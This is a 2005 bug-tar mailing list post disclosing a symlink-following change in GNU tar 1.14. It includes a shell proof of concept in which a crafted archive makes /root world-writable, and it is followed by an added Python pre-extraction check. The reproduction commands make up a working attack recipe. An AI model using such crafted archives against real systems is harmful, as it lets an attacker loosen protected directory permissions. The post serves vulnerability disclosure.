bug-tar
From: Clarence Dang
Subject: [Bug-tar] Unexpected symlink attack due to change in link following behaviour
Date: Fri, 9 Sep 2005 22:08:14 +1000
User-agent: KMail/1.8

Hi,

I just discovered that tar 1.14 enabled the opposite of "--no-overwrite-dir" 
by default.  This is an unexpected and subtle change in behavior.


Users of tar who are unaware of this change are subject to the following 
exploit:

The hacker constructs "dir.tar" and sends it to the unsuspecting user.

~~~~
# mkdir dir
# >dir/YOU_HAVE_BEEN_HACKED.txt
# chmod a+rwx dir
# tar cf dir.tar dir
# rm -rf dir
~~~~

The user happens to have a symlink called "dir" in the current directory and 
untars "dir.tar":

~~~~
# tar --version
tar (GNU tar) 1.15.1

# ls -ld /root
drwx------  25 root root 1784 Sep  3 23:00 /root
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory

# ln -s /root dir  # (simulate already existing symlink)
# tar xf dir.tar

# ls -ld /root
drwxrwxrwx  25 root root 1824 Sep  3 23:02 /root
# ls -l /root/*.txt
-rw-r--r--  1 root root 0 Sep  3 23:02 /root/YOU_HAVE_BEEN_HACKED.txt

# ls -ld dir
lrwxrwxrwx  1 root root 5 Sep  3 23:06 dir -> /root
~~~~

An older version of tar gives the expected - and safer - behaviour:

~~~~
# tar --version
tar (GNU tar) 1.13.25
[...]

# ls -ld /root
drwx------  25 root root 1784 Sep  3 23:00 /root
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory

# ln -s /root dir  # (simulate already existing symlink)
# tar xf dir.tar

# ls -ld /root
drwx------   21 root     root         2144 Sep  3 22:35 /root/
# ls -l /root/*.txt
ls: /root/*.txt: No such file or directory

# ls -ld dir
drwxrwxrwx    2 root     root           88 Sep  3 23:02 dir/
~~~~


In-the-wild "exploit": Typing "make install" as root for the second time with 
DOSEMU 1.3.2 or CVS source (prior to a few minutes ago) will change the 
permissions of "/tmp" from "rwxrwxrwt" to "rwxr-xr-x", creating a DoS for 
non-root users.

https://sourceforge.net/tracker/?func=detail&atid=457447&aid=1224934&group_id=49784

The reason for this is that at "make install" time, a symbolic link 
"/usr/local/share/dosemu/freedos/tmp" is made to point to "/tmp".  On the 
second invocation of "make install", dosemu-freedos-bin.tgz is unpacked to 
"/usr/local/share" - however it contains a directory "dosemu/freedos/tmp" 
with permissions "rwxr-xr-x".


Suggested fix: Revert relevant behaviour to tar 1.13.25.  As DOSEMU has shown, 
it is too dangerous to change this kind of behaviour and expect users to 
realise that such a change has occurred.  Imagine changing "rm -i" to delete 
files without prompting!


Clarence
[please CC me on replies]
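An added defender-side check, not part of this post or of GNU tar: before extracting, list the archive's directory entries whose destination path, or any parent of it, already exists as a symlink, since tar 1.14+ follows that link and applies the archived mode to its target. The archive and the "victim" directory are constructed inline to mirror the post's scenario; the function names are assumptions.

```python
import io
import os
import tarfile
import tempfile


def build_sample_archive():
    """Constructed stand-in for the post's dir.tar: a world-writable
    directory 'dir' containing one empty file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        d = tarfile.TarInfo("dir")
        d.type, d.mode = tarfile.DIRTYPE, 0o777
        tar.addfile(d)
        f = tarfile.TarInfo("dir/YOU_HAVE_BEEN_HACKED.txt")
        tar.addfile(f, io.BytesIO(b""))
    buf.seek(0)
    return buf


def symlinked_dir_members(archive, dest):
    """Return (member, symlinked prefix, link target) for each directory
    entry whose path under `dest`, or any parent of it, is already a
    symlink; tar 1.14+ would apply the archived mode to the link target."""
    hits = []
    with tarfile.open(fileobj=archive, mode="r") as tar:
        for m in tar.getmembers():
            if not m.isdir():
                continue
            parts = m.name.strip("/").split("/")
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                path = os.path.join(dest, prefix)  # no realpath: keep the link
                if os.path.islink(path):
                    hits.append((m.name, prefix, os.readlink(path)))
                    break
    return hits


def demo():
    """Recreate the post's setup in a scratch directory: 'dir' already
    exists as a symlink to a directory standing in for /root."""
    with tempfile.TemporaryDirectory() as work:
        victim = os.path.join(work, "victim")
        os.mkdir(victim)
        os.symlink(victim, os.path.join(work, "dir"))
        return symlinked_dir_members(build_sample_archive(), work)


if __name__ == "__main__":
    for name, prefix, target in demo():
        print(f"refuse: {name!r} goes through symlink {prefix!r} -> {target}")
```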